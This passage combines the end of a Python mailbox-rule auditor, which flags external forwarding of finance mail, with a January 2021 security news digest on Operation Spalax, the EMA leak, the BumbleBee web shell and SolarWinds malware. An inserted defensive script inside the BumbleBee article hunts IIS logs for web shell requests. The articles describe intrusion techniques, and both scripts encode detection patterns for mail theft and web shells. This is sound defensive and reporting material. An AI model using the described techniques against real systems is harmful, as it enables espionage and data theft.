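            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                          d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] \
                    and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def looks_like_finance(phrase):
    """True if any word of the phrase is within one edit of a finance term."""
    return any(osa_distance(w.lower(), k) <= 1
               for w in phrase.split() for k in FINANCE_KEYWORDS)


def is_external(address):
    return address.rsplit("@", 1)[-1].lower() not in ORG_DOMAINS


def audit_rule(rule):
    """Return a list of human-readable findings for one rule."""
    findings = []
    targets = rule.get("forward_to", []) + rule.get("redirect_to", [])
    external = [t for t in targets if is_external(t)]
    if external:
        findings.append("forwards to external address(es): "
                        + ", ".join(external))
    folder = (rule.get("move_to_folder") or "").lower()
    if folder in HIDE_FOLDERS:
        findings.append(f"moves matching messages into '{folder}'")
    finance = [p for p in rule.get("subject_or_body_contains", [])
               if looks_like_finance(p)]
    if finance and targets:
        findings.append("forwards finance-related messages (keywords: "
                        + ", ".join(finance) + ")")
    return findings


def audit_mailbox(rules):
    """Map rule name -> findings, only for rules that raised any."""
    return {r["name"]: f for r in rules if (f := audit_rule(r))}


if __name__ == "__main__":
    for name, findings in audit_mailbox(SAMPLE_RULES).items():
        print(name)
        for line in findings:
            print("  -", line)
```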
Experts Uncover Malware Attacks Against Colombian Government and Companies
15.1.2021 BigBrothers Thehackernews
Cybersecurity researchers took the wraps off an ongoing surveillance campaign directed against Colombian government institutions and private companies in the energy and metallurgical industries.
In a report published by ESET on Tuesday, the Slovak internet security company said the attacks — dubbed "Operation Spalax" — began in 2020, with the modus operandi sharing some similarities to an APT group targeting the country since at least April 2018, but also different in other ways.
The overlaps come in the form of phishing emails, which have similar topics and pretend to come from some of the same entities that were used in a February 2019 operation disclosed by QiAnXin researchers, and subdomain names used for command-and-control (C2) servers.
However, the two campaigns diverge in the attachments used for phishing emails, the remote access trojans (RATs) deployed, and the C2 infrastructure employed to fetch the malware dropped.
The attack chain begins with the targets receiving phishing emails that lead to the download of malicious files, which are RAR archives hosted on OneDrive or MediaFire containing various droppers responsible for decrypting and running RATs such as Remcos, njRAT, and AsyncRAT on a victimized computer.
The phishing emails cover a wide range of topics, including driving infractions, court hearings to attend, and mandatory COVID-19 tests, thus increasing the likelihood that unsuspecting users will open the messages.
In an alternate scenario observed by ESET, the attackers were also found to use heavily obfuscated AutoIt droppers that used shellcode to decrypt the payload and another to inject it into an already running process.
The RATs not only come with capabilities for remote control but also to spy on targets by capturing keystrokes, recording screenshots, stealing clipboard data, exfiltrating sensitive documents, and even downloading and executing other malware.
ESET's analysis also revealed a scalable C2 architecture operated using a Dynamic DNS service that allowed the attackers to dynamically assign a domain name to an IP address from a pool of 70 different domain names and 24 IP addresses in the second half of 2020 alone.
"Targeted malware attacks against Colombian entities have been scaled up since the campaigns that were described last year," the researchers concluded. "The landscape has changed from a campaign that had a handful of C2 servers and domain names to a campaign with very large and fast-changing infrastructure with hundreds of domain names used since 2019."
Hackers Leak Stolen Pfizer-BioNTech COVID-19 Vaccine Data
14.1.2021 BigBrothers Threatpost
On the heels of a cyberattack on the EMA, cybercriminals have now leaked Pfizer and BioNTech COVID-19 vaccine data on the internet.
On the heels of a previously-reported cyberattack on the European Medicines Agency (EMA), cybercriminals have spilled compromised data related to COVID-19 vaccinations onto the internet.
The EMA is an agency of the European Union in charge of the evaluation and supervision of medicinal products in the E.U., similar to the FDA in the U.S. In December, the agency disclosed that threat actors broke into its server and accessed documentation about the vaccine from Pfizer and BioNTech. Specifically, some documents relating to the regulatory submission for the companies’ COVID-19 vaccine candidate, BNT162b2, which were stored on the EMA server, were accessed, a Pfizer spokesperson confirmed to Threatpost.
Fast forward to this week, when “the ongoing investigation of the cyberattack on EMA revealed that some of the unlawfully accessed documents related to COVID-19 medicines and vaccines belonging to third parties have been leaked on the internet.” According to a Tuesday update from the EMA on its website, “necessary action is being taken by the law-enforcement authorities.”
The EMA has not disclosed detailed specifics of the cyberattack, including the timeframe, the initial point of compromise and what specific data on these regulatory submission documents was accessed. In its Tuesday update, it said it continues to notify “additional entities and individuals whose documents and personal data may have been subject to unauthorized access.”
However, the networks of the EMA remain fully functional and the timelines related to the evaluation and approval of COVID-19 vaccines are not affected, the agency stressed. The BNT162b2 vaccine has been rolled out across the U.K. and is in the process of being approved and rolled out in other countries. Of note, Pfizer and BioNTech submitted vaccine approval requests to European drug regulatory bodies on Dec. 1.
Threatpost has reached out to the EMA, Pfizer and BioNTech for further comment.
“It is important to note that no BioNTech or Pfizer systems have been breached in connection with this incident, and we are unaware of any personal data being accessed,” a Pfizer spokesperson said. “At this time, we await further information about EMA’s investigation and will respond appropriately and in accordance with E.U. law…. Our focus remains steadfast on working in close partnership with governments and regulators around the world to bring our COVID-19 vaccine to people around the globe as safely and as efficiently as possible to help bring an end to this devastating pandemic.”
The cyberattack comes during the mass rollout of various COVID-19 vaccines worldwide. Documents about these vaccines – and the development process behind them – can be used for malicious intent of various stripes, such as espionage or financial cyberattacks.
One other reason for cybercriminals to publish such data on the internet could be to create noise or misinformation, Dirk Schrader, global vice president at New Net Technologies told Threatpost. Or, it could be about gaining glory in the underground.
“EMA, as a European institution, is certainly considered a hard target,” said Schrader. “This might be the simplest reason for the documents being published, as a kind of proof among hacking groups.”
Cybercriminals have been tapping into the vaccine rollout with everything from simple phishing scams all the way up to sophisticated Zebrocy malware campaigns. Earlier in December, it was revealed that the Lazarus Group APT and other sophisticated nation-state actors were actively trying to steal COVID-19 research to speed up their countries’ vaccine-development efforts. That added onto previously reported espionage attacks on vaccine-makers AstraZeneca and Moderna.
Joseph Carson, chief security scientist and advisory CISO at Thycotic, told Threatpost that the incident is a hard reminder that cybercriminals will try to gain unauthorized access and steal sensitive information linked to COVID-19 – especially any details related to vaccines.
“Any company or government working on COVID-19 vaccines or testing must increase the priority of cybersecurity especially privileged access as they will continue to be directly targeted by cyberattacks, while right now vaccines are being distributed there is no time for complacency,” Carson told Threatpost. “The latest updated statement released by the EMA, who is the victim of this recent data breach, indicates that the regulatory submission had been accessed unlawfully and now leaked which is a reminder that privileged access security is and will continue to be a challenge for companies to get in control and it must be a top priority for security.”
Official: Number of Victims of Russian Hack Likely to Grow
14.1.2021 BigBrothers Securityweek
The number of federal agencies and private companies who learn that they have been affected by a massive Russian hack is expected to grow as the investigation into it continues, the U.S. government’s chief counterintelligence official said Tuesday.
The FBI and other agencies last week attributed the intrusions to Russia as part of what officials described as an intelligence-gathering operation rather than an effort to damage or disrupt U.S. government operations. U.S. officials said at the time that fewer than 10 federal agencies were believed to have been compromised “by follow-on activity on their systems.”
William Evanina, the director of the U.S. National Counterintelligence and Security Center, said in a live-stream Washington Post interview that he expected to see a “growth” in the number of victims.
So far, the list of agencies known to have been affected includes the Treasury, Commerce and Justice departments, among others.
“I think this will expand accordingly as we identify” additional victims, Evanina said. “I think the hard part for the investigators is we don’t know what we don’t know, but I think this will continue to grow.”
The hacking campaign was extraordinary in scale, with the intruders having stalked through government agencies, defense contractors and telecommunications companies for months by the time it was discovered. Experts say that gave the foreign agents ample time to collect data that could be highly damaging to U.S. national security, though the scope of the breaches and exactly what information was sought is unknown.
An estimated 18,000 organizations were affected by malicious code that piggybacked on popular network-management software from an Austin, Texas, company called SolarWinds.
On Monday, SolarWinds said its investigation found evidence the campaign began in September 2019, with the hackers injecting test code that month. The hackers’ patience was impressive. The malicious code that allowed backdoors to be surreptitiously opened on SolarWinds customers had been hidden in an upgrade by the end of February that was delivered to clients beginning the next month.
It would not be discovered for another nine months.
Hackers Publish COVID-19 Vaccine Data Stolen From EU Medicines Agency
14.1.2021 BigBrothers Securityweek
Hackers have started leaking documents related to COVID-19 medicine and vaccines that were stolen from the European Medicines Agency (EMA) in early December 2020.
The data breach resulted in “a limited number of documents belonging to third parties” being unlawfully accessed, EMA announced on December 11. An investigation was immediately launched into the incident.
While EMA did not provide information on the affected third-parties, Pfizer and BioNTech at the time published a joint statement to reveal that the incident resulted in hackers accessing “some documents relating to the regulatory submission for Pfizer and BioNTech’s COVID-19 vaccine candidate, BNT162b2.”
At the time, Pfizer and BioNTech also said that no trial participants appeared to have been identified using the accessed data.
One week later, EMA, which contacted law enforcement and contracted a third-party firm to support the investigation into the incident, reiterated that the data breach affected only a limited number of documents.
On Wednesday, the agency revealed that the threat actor behind the data breach has published some of the documents that were stolen during the incident (in which a single IT application containing data related to COVID-19 medicines and vaccines was compromised).
“The ongoing investigation of the cyberattack on EMA revealed that some of the unlawfully accessed documents related to COVID-19 medicines and vaccines belonging to third parties have been leaked on the internet. Necessary action is being taken by the law enforcement authorities,” EMA announced.
The regulator also notes that it continues to notify the entities and individuals who might have had documents or personal data accessed during the data breach.
“The Agency and the European medicines regulatory network remain fully functional and timelines related to the evaluation and approval of COVID-19 medicines and vaccines are not affected,” EMA also said.
While both EMA and the affected organizations refrained from providing specific information on the accessed files, BleepingComputer says Microsoft Word documents, PowerPoint presentations, email screenshots, EMA peer review comments, and PDF documents were stolen.
The hackers started leaking data allegedly stolen from EMA at the end of December.
BumbleBee Opens Exchange Servers in xHunt Spy Campaign
13.1.2021 BigBrothers Threatpost
The BumbleBee web shell allows APT attackers to upload and download files, and move laterally by running commands.
A webshell called BumbleBee has taken flight in an ongoing xHunt espionage campaign that has targeted Microsoft Exchange servers at Kuwaiti organizations.
According to researchers at Palo Alto Networks’ Unit 42, BumbleBee (so named because of its color scheme) was observed being used to upload and download files to and from a compromised Exchange server back in September.
“We found BumbleBee hosted on an internal Internet Information Services (IIS) web server on the same network as the compromised Exchange server, as well as on two internal IIS web servers at two other Kuwaiti organizations,” researchers explained in a Monday blog.
Analysis showed that the attackers used VPN access to directly talk to BumbleBee, frequently switching between different VPN servers that appeared to be from different countries, including Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden and the United Kingdom.
This hodgepodge approach was also borne out in the rotation of different operating systems and browsers, specifically Mozilla Firefox or Google Chrome on Windows 10, Windows 8.1 or Linux systems, the firm found.
“We believe this is an attempt to evade detection and make analysis of the malicious activities more difficult,” Unit 42 researchers noted. “This [also] suggests the actor has access to multiple systems and uses this to make analysis of the activities more difficult, or that there are multiple actors involved, who have differing preferences for operating systems and browsers.”
BumbleBee was also used in lateral-movement efforts, running commands from the attackers to discover additional systems. And indeed, the researchers discovered additional BumbleBee webshells hosted on internal IIS web servers that are not connected to the internet at all three Kuwaiti organizations. The cyberattackers used SSH tunnels to interact with these, created using the PuTTY Link (Plink) tool.
“We observed the actor using Plink to create an SSH tunnel for TCP port 3389, which suggests that the actor used the tunnel to access the system using Remote Desktop Protocol (RDP),” researchers wrote. “We also observed the actor creating SSH tunnels to internal servers for TCP port 80, which suggests the actor used the tunnel to access internal IIS web servers. We believe that the actor accessed these additional internal IIS web servers to leverage file uploading functionality in internal web applications to install BumbleBee as a method of lateral movement.”
BumbleBee: Password Pollination
Looking deeper into the web shell, Unit 42 found that BumbleBee requires an attacker to supply one password to view the web shell, and a second password to interact with it.
“The actor must [first] provide a password in a URL parameter named parameter,” according to the firm. “Otherwise, the form used to interact with BumbleBee will not display in the browser. To check the supplied password for authentication, the web shell will generate an MD5 hash of the parameter value and check it with a hardcoded MD5 hash.”
Once the operators are able to access BumbleBee, it provides three main functionalities: Executing commands, and uploading and downloading files from the compromised server.
“To carry out any of these functions, the actor must supply a second password,” researchers wrote. “The BumbleBee web shell will generate an MD5 hash of the password and check it with a hardcoded MD5 hash before carrying out the functionality.”
BumbleBee, the Spy Bee
In looking at the IIS server logs and other logs from the Exchange server, the researchers were able to observe the HTTP POST requests generated when the attackers issued commands via BumbleBee.
After some additional analysis, researchers were able to piece together a fuller picture of what BumbleBee is specifically used for.
“The actor spent three hours and 37 minutes on Sept. 16, 2020, running commands via the BumbleBee web shell installed on the [first] compromised Exchange server,” according to the analysis.
The activities included network discovery using the ping and net group commands, as well as PowerShell, to find additional computers on the network; account discovery using the whoami and quser commands; determining the system time using the W32tm and time commands; creating an SSH tunnel with Plink to a remote host and using RDP over that tunnel to control the compromised computer; lateral movement to another system by mounting a shared folder; and, finally, removing evidence of the attack by deleting BumbleBee once they were done issuing commands.
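The POST requests that Unit 42 recovered from the IIS logs are the kind of artifact a defender can hunt for. The following is an added example, not code from the Unit 42 report: it parses IIS W3C-format log lines, flags POST requests to .aspx pages whose query string carries the "parameter" field BumbleBee uses for its view password, and summarises how many distinct client addresses and user agents hit each page, which surfaces the VPN and browser rotation described above. The log lines, the web shell path and the client addresses are constructed placeholders.

```python
import re
from collections import defaultdict

# Constructed IIS W3C log excerpt (not from the Unit 42 report). The web shell
# path, the password value and the client addresses are placeholders.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2020-09-16 08:01:12 10.0.0.5 GET /owa/auth/logon.aspx - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0)+Firefox/80.0 200
2020-09-16 08:03:45 10.0.0.5 POST /owa/auth/current/themes/bee.aspx parameter=s3cret 198.51.100.23 Mozilla/5.0+(Windows+NT+10.0)+Firefox/80.0 200
2020-09-16 08:05:02 10.0.0.5 POST /owa/auth/current/themes/bee.aspx parameter=s3cret 198.51.100.77 Mozilla/5.0+(Windows+NT+6.3)+Chrome/85.0 200
2020-09-16 08:09:30 10.0.0.5 POST /owa/auth/current/themes/bee.aspx parameter=s3cret 192.0.2.200 Mozilla/5.0+(X11;+Linux+x86_64)+Firefox/80.0 200
2020-09-16 08:10:11 10.0.0.5 POST /ecp/default.aspx - 203.0.113.10 Mozilla/5.0+(Windows+NT+10.0)+Firefox/80.0 302
"""


def parse_iis_w3c(text):
    """Yield one dict per log record, naming columns from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue  # other directives (#Software, #Date, ...) and blank lines
        values = line.split()
        # IIS writes a space-free token per field (spaces in values become '+'),
        # so a token count mismatch means a truncated or foreign line: skip it.
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))


def find_webshell_candidates(text, auth_param="parameter", min_sources=2):
    """Return .aspx pages that received POSTs carrying the web shell auth parameter.

    Each finding records hit count, distinct client IPs and distinct user agents;
    'rotating_sources' is set when at least min_sources different clients were
    seen, the VPN-hopping pattern Unit 42 observed.
    """
    pattern = re.compile(r"(^|&)" + re.escape(auth_param) + r"=")
    per_page = defaultdict(lambda: {"hits": 0, "clients": set(), "agents": set()})
    for rec in parse_iis_w3c(text):
        if rec.get("cs-method") != "POST":
            continue
        stem = rec.get("cs-uri-stem", "")
        if not stem.lower().endswith(".aspx"):
            continue
        if not pattern.search(rec.get("cs-uri-query", "-")):
            continue
        entry = per_page[stem]
        entry["hits"] += 1
        entry["clients"].add(rec.get("c-ip", "-"))
        entry["agents"].add(rec.get("cs(User-Agent)", "-"))

    findings = []
    for stem, entry in per_page.items():
        findings.append({
            "uri_stem": stem,
            "hits": entry["hits"],
            "distinct_clients": len(entry["clients"]),
            "distinct_agents": len(entry["agents"]),
            "rotating_sources": len(entry["clients"]) >= min_sources,
        })
    # Most-hit pages first so the noisiest candidate tops the report.
    return sorted(findings, key=lambda f: f["hits"], reverse=True)


if __name__ == "__main__":
    for finding in find_webshell_candidates(SAMPLE_IIS_LOG):
        print(finding)
```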
In addition to analyzing commands executed on the compromised Exchange server, Unit 42 also analyzed the commands executed on the BumbleBee web shell at an internal IIS web server hosted at one of the two other Kuwaiti organizations.
“On Sept. 10, 2020, we found that the actor ran several commands to perform network and user account discovery. Additionally, the actor used BumbleBee to upload a second web shell with a filename of cq.aspx. The actor used this second web shell to run a PowerShell script that issued SQL queries to a Microsoft SQL Server database.”
Ongoing Campaign
The known xHunt threat group, first discovered in 2018, has previously launched an array of attacks targeting the Kuwaiti government as well as shipping and transportation organizations, and has steadily updated its arsenal of tools, all in the service of spying on its targets.
The most recent campaign stretched back to February, when xHunt compromised an Exchange server via Outlook Web App using compromised credentials.
“The actor used the search functionality within Outlook Web App to search for email addresses, including searching for the domain name of the compromised Kuwaiti organization to get a full list of email addresses, as well as specific keywords, such as helpdesk,” researchers explained. “We also saw the actor viewing emails in the compromised account’s inbox, specifically emails from service providers and technology vendors. Additionally, the actor viewed alert emails from a Symantec product and Fortinet’s FortiWeb product.”
This searching for emails to the helpdesk and viewing security alert emails suggests that xHunt was keeping abreast of whether the Kuwaiti organization had noticed malicious activity.
“The attempts to conceal their location and the focus on viewing emails that might notify administrators of the compromised network of the attacker’s presence may explain how the actor was able to maintain a presence on the compromised network for many months,” the researchers noted.
Connecting the dots between SolarWinds and Russia-linked Turla APT
12.1.2021 BigBrothers Securityaffairs
Experts have found some similarities between the Sunburst backdoor used in the SolarWinds supply chain attack and Turla’s backdoor Kazuar.
Security experts from Kaspersky have identified multiple similarities between the Sunburst malware used in the SolarWinds supply chain attack and the Kazuar backdoor that has been employed in cyber espionage campaigns conducted by Russia-linked APT group Turla.
The discovery comes a few days after the US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.
The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.
While dissecting the Sunburst malware, Kaspersky experts noticed several similarities with the Kazuar, including a number of unusual, shared features.
“While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Kazuar is a .NET backdoor first reported by Palo Alto in 2017. Palo Alto tentatively linked Kazuar to the Turla APT group, although no solid attribution link has been made public. Our own observations indeed confirm that Kazuar was used together with other Turla tools during multiple breaches in past years.” reads the report published by Kaspersky.
“A number of unusual, shared features between Sunburst and Kazuar include the victim UID generation algorithm, the sleeping algorithm and the extensive usage of the FNV-1a hash.”
Palo Alto Networks is the security firm that first collected evidence that could link Kazuar to Turla APT.
Kazuar is a fully featured .NET backdoor that was used by the Russia-linked APT group to replace the group’s second stage backdoors, including Carbon platform.
“We do not know who is behind the SolarWinds hack – we believe attribution is a question better left for law enforcement and judicial institutions. To clarify, our research has identified a number of shared code features between the Sunburst malware and Kazuar.” continues the report.
Kaspersky reported that the Kazuar malware was continuously improved; the newest sample was detected by Kaspersky on December 29, 2020.
Experts noticed multiple similarities between code fragments from Sunburst and Kazuar variants, although the UID calculation subroutine, the use of the FNV-1a hashing algorithm and the sleep loop are not identical.
Kaspersky offered several possible explanations for these similarities. One is that Sunburst and Kazuar were developed by the same threat actors; another is that the Sunburst developers borrowed part of the code from Kazuar, which would not imply that the two groups are connected.
Below the full list of assumptions made by Kaspersky:
Sunburst was developed by the same group as Kazuar
The Sunburst developers used some ideas or code from Kazuar, without having a direct connection (they used Kazuar code as “inspiration”)
Both groups, that is, the DarkHalo/UNC2452 and the group using Kazuar obtained their malware from the same source
One of the Kazuar developers moved to another team, taking his knowledge and tools with them
The Sunburst developers introduced these subtle links as a form of a false flag, in order to shift the blame to another group
At the time of this report, it is not possible to determine which of the above assumptions is correct.
NSA Publishes Cybersecurity Year in Review Report
12.1.2021 BigBrothers Securityweek
The United States National Security Agency (NSA) has released its 2020 Cybersecurity Year in Review report, which summarizes the NSA Cybersecurity Directorate's first full year of operation.
The Cybersecurity Directorate was formally announced in July 2019, with a focus on protecting national security networks and the defense industrial base. Led by Ms. Anne Neuberger, Director of Cybersecurity, the Directorate was also aiming to improve cybersecurity efforts through partnerships.
The Cybersecurity Directorate remained true to its goal throughout 2020, the report claims, working to prevent and eradicate cyber threats by combining threat intelligence and cryptography knowledge with vulnerability analysis and defense operations.
“Drawing on lessons learned from the 2016 presidential election and the 2018 mid-term elections, NSA was fully engaged in whole-of-government efforts to protect the 2020 election from foreign interference and influence. Cybersecurity was a foundational component of NSA’s overall election defense effort,” the report (PDF) reads.
Last year, the NSA helped the Department of Defense (DoD) eliminate weak cryptography and approved quantum-resistant cryptographic algorithms, to ensure that the Department’s cryptography is modern enough to resist quantum computing attacks.
In the context of the COVID-19 pandemic, the NSA helped the DoD’s transition to telework, providing solutions for approximately 100,000 users to work remotely securely. Furthermore, the Agency was involved in Operation Warp Speed (OWS), an effort aimed at accelerating the development of a COVID-19 vaccine.
Since the Directorate’s creation, the NSA has provided 30 unique, timely and actionable cybersecurity products to alert the National Security System (NSS), DoD, and Defense Industrial Base (DIB) network owners of cyber-threats.
Some of the intelligence shared by the Agency in 2020 includes details on Windows 10 flaws and on Drovorub malware, IOCs associated with the targeting of Exim mail servers by the Russia-linked Sandworm Team, details on bugs threat actors abuse to install web shell malware on web servers, and a list of 25 vulnerabilities commonly targeted by Chinese threat actors.
Although the Cybersecurity Advisories (CSAs) were mainly destined for NSS, DoD, and DIB owners, the private sector in the United States and abroad could also leverage the intelligence to strengthen security posture, the NSA says.
Furthermore, the NSA released guidance on properly configuring IPsec VPNs (IP Security Virtual Private Networks), on how to customize Unified Extensible Firmware Interface (UEFI) Secure Boot, and on how to secure networks and employees during telework.
Last year, NSA’s Cybersecurity Collaboration Center worked on advancing public-private collaboration and on refocusing Enduring Security Framework (ESF) efforts toward the security of 5G deployments. The Agency also launched the Center for Cybersecurity Standards (CCSS), meant to engage with standards bodies.
“NSA also continues to discover and release cybersecurity vulnerabilities to private industry through an approved, intra-government process. For the past three years, vulnerability disclosures by NSA have trended upward, as the Agency commits to enabling the security of commercial technologies that the U.S. Government, our military, our businesses, and our citizens rely upon,” the Agency notes.
Unveiled: SUNSPOT Malware Was Used to Inject SolarWinds Backdoor
12.1.2021 BigBrothers Threatpost
As the investigation into the SolarWinds supply-chain attack continues, cybersecurity researchers have disclosed a third malware strain that was deployed into the build environment to inject the backdoor into the company's Orion network monitoring platform.
Called "Sunspot," the malignant tool adds to a growing list of previously disclosed malicious software such as Sunburst and Teardrop.
"This highly sophisticated and novel code was designed to inject the Sunburst malicious code into the SolarWinds Orion Platform without arousing the suspicion of our software development and build teams," SolarWinds' new CEO Sudhakar Ramakrishna explained.
While preliminary evidence found that operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, the latest findings reveal a new timeline that establishes the first breach of SolarWinds network on September 4, 2019 — all carried out with an intent to deploy Sunspot.
"Sunspot monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the Sunburst backdoor code," Crowdstrike researchers said in a Monday analysis.
Crowdstrike is tracking the intrusion under the moniker "StellarParticle."
Once installed, the malware ("taskhostsvc.exe") grants itself debugging privileges and sets about hijacking the Orion build workflow: it monitors running software processes on the server and replaces a source code file in the build directory with a malicious variant, injecting Sunburst while Orion is being built.
"The subsequent October 2019 version of the Orion Platform release appears to have contained modifications designed to test the perpetrators' ability to insert code into our builds," Ramakrishna said, echoing previous reports from ReversingLabs.
The development comes as Kaspersky researchers found what appears to be a first potential connection between Sunburst and Kazuar, a malware family linked to Russia's Turla state-sponsored cyber-espionage outfit.
The cybersecurity firm, however, refrained from drawing too many inferences from the similarities, instead suggesting that the overlaps may have been intentionally added to mislead attribution.
While the similarities are far from a smoking gun tying the hack to Russia, U.S. government officials last week formally pinned the Solorigate operation on an adversary "likely Russian in origin."
Researchers Find Links Between Sunburst and Russian Kazuar Malware
12.1.2021 BigBrothers Threatpost
Cybersecurity researchers, for the first time, may have found a potential connection between the backdoor used in the SolarWinds hack and a previously known malware strain.
In new research published by Kaspersky researchers today, the cybersecurity firm said it discovered several features that overlap with another backdoor known as Kazuar, a .NET-based malware first documented by Palo Alto Networks in 2017.
Disclosed early last month, the espionage campaign was notable for its scale and stealth, with the attackers leveraging the trust associated with SolarWinds Orion software to infiltrate government agencies and other companies so as to deploy a custom malware codenamed "Sunburst."
Shared Features Between Sunburst and Kazuar
Attribution for the SolarWinds supply-chain compromise has been difficult in part due to little-to-no clues linking the attack infrastructure to previous campaigns or other well-known threat groups.
But Kaspersky's latest analysis of the Sunburst backdoor has revealed a number of shared features between the malware and Kazuar, leading the researchers to suspect that —
Both Sunburst and Kazuar were developed by the same threat group
The adversary behind Sunburst used Kazuar as an inspiration
The groups behind Kazuar (Turla) and Sunburst (UNC2452 or Dark Halo) obtained the malware from a single source
The developers of Kazuar moved to another team, taking their toolset with them, or
The Sunburst developers deliberately introduced these links as "false flag" to shift blame to another group
The commonalities shared between the two malware families include the use of a sleeping algorithm to stay dormant for a random period between connections to a C2 server, the extensive usage of the FNV-1a hash to obfuscate the malicious code, and the use of a hashing algorithm to generate unique victim identifiers.
While Kazuar randomly selects a sleeping period between two and four weeks between C2 connections, Sunburst randomly opts for a sleeping period between 12 and 14 days before contacting the server for initial reconnaissance. But researchers noted that the formula used to calculate the sleeping time remains the same.
Kazuar's Possible Links to Turla
Kazuar is a fully featured backdoor written using the .NET Framework and relies on a command-and-control (C2) channel to allow actors to interact with the compromised system and exfiltrate data. Its features run the typical spyware gamut, with support for running malicious commands, capturing screenshots, and even deploying additional functionality via a plugin command.
Palo Alto Networks' Unit 42 team tentatively linked the tool to the Russian threat group Turla (aka Uroburos and Snake) based on the fact that the "code lineage in Kazuar can be traced back to at least 2005."
What's more, on November 18, 2020, Kazuar appears to have undergone a complete redesign with new keylogger and password-stealing functions added to the backdoor that's implemented in the form of a C2 server command.
While it's normal for threat actors to keep updating their toolset and introduce features designed to bypass endpoint detection and response (EDR) systems, Kaspersky researchers raised the possibility that the changes may have been introduced in response to the SolarWinds breach.
"Suspecting the SolarWinds attack might be discovered, the Kazuar code was changed to resemble the Sunburst backdoor as little as possible," the researchers said.
CISA Updates SolarWinds Advisory
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Federal Bureau of Investigation (FBI), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA), issued a joint statement formally accusing an adversary "likely Russian in origin" for staging the SolarWinds hack.
Furthermore, CISA, in an update to its advisory on January 6, said, "incident response investigations have identified that initial access in some cases was obtained by password guessing, password spraying, and inappropriately secured administrative credentials accessible via external remote access services."
"These code overlaps between Kazuar and Sunburst are interesting and represent the first potential identified link to a previously known malware family," Kaspersky researchers concluded.
"While Kazuar and Sunburst may be related, the nature of this relation is still not clear. Through further analysis, it is possible that evidence confirming one or several of these points might arise. At the same time, it is also possible that the Sunburst developers were really good at their opsec and didn't make any mistakes, with this link being an elaborate false flag."
SolarWinds hackers also used common hacker techniques, CISA revealed
10.1.2021 BigBrothers Securityaffairs
CISA revealed that threat actors behind the SolarWinds hack also used password guessing and password spraying in its attacks.
Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack also employed common hacker techniques to compromise the networks of the targeted organizations, including password guessing and password spraying.
“Frequently, CISA has observed the APT actor gaining Initial Access [TA0001] to victims’ enterprise networks via compromised SolarWinds Orion products (e.g., Solorigate, Sunburst).[1]” reads the CISA’s alert. “However, CISA is investigating instances in which the threat actor may have obtained initial access by Password Guessing [T1110.001], Password Spraying [T1110.003], and/or exploiting inappropriately secured administrative or service credentials (Unsecured Credentials [T1552]) instead of utilizing the compromised SolarWinds Orion products.”
CISA also added that inappropriately secured administrative credentials accessible via external remote access services were abused by the attackers.
The alert issued on January 6, highlights that it does not supersede the requirements of ED 21-01 or any supplemental guidance and does not represent formal guidance to federal agencies under ED 21-01.
CISA added that it is investigating incidents in which threat actors abused the Security Assertion Markup Language (SAML) tokens.
Experts from CISA observed threat actors escalating privileges within a compromised network and using native Windows tools and techniques, such as Windows Management Instrumentation (WMI), to enumerate the Microsoft Active Directory Federation Services (ADFS) certificate-signing capability. The attackers then used it to forge authentication tokens (OAuth) to issue claims to service providers and attempt to access Microsoft cloud environments.
At the end of December, the Microsoft 365 Defender Team revealed that the goal of the threat actors behind the SolarWinds supply chain attack was to move to the victims’ cloud infrastructure once infected their network with the Sunburst/Solorigate backdoor.
In a report published on December 28, Microsoft said the threat actor’s primary goal was to gain access to cloud-hosted infrastructure, which in many cases was the company’s own Azure and Microsoft 365 environments.
To help victims deal with these “to-cloud” escalations, CISA has also published a second advisory today with guidance on how to search Microsoft-based cloud setups for traces of this group’s activity and then remediate servers.
Once the backdoor was deployed, threat actors used it to steal credentials, escalate privileges, and move laterally within the target network to gain the ability to create valid SAML tokens. Microsoft experts reported that attackers created valid SAML tokens by stealing the SAML signing certificate or by adding or modifying an existing federation trust.
Then the attackers created SAML tokens to access cloud resources and exfiltrate emails and sensitive data.
“This attack is an advanced and stealthy campaign with the ability to blend in, which could allow attackers to stay under the radar for long periods of time before being detected.” continues the post.
Recently, both US CISA and cybersecurity firm Crowdstrike released free detection tools to audit Azure and MS 365 environments.
SolarWinds Hires Chris Krebs, Alex Stamos in Wake of Hack
9.1.2021 BigBrothers Threatpost
Former CISA director Chris Krebs and former Facebook security exec Alex Stamos have teamed up to create a new consulting group – and have been hired by SolarWinds.
SolarWinds, which has been embroiled in a recent, widescale hack, has called in two security powerhouses for help: Former director of the Cybersecurity and Infrastructure Security Agency (CISA) Chris Krebs, and former Facebook security executive Alex Stamos.
Texas-based SolarWinds hired the duo as crisis-response consultants in the fallout of a cyberattack, discovered in December, in which the company’s network-management platform was targeted in a massive supply-chain hack. Several high-profile victims were affected – including the U.S. Department of Homeland Security (DHS), and the Treasury and Commerce departments.
Krebs is the former (and first) director of CISA, first appointed in 2018. In November, he was axed by the Trump administration in a move that drew public criticism from government officials and security experts alike.
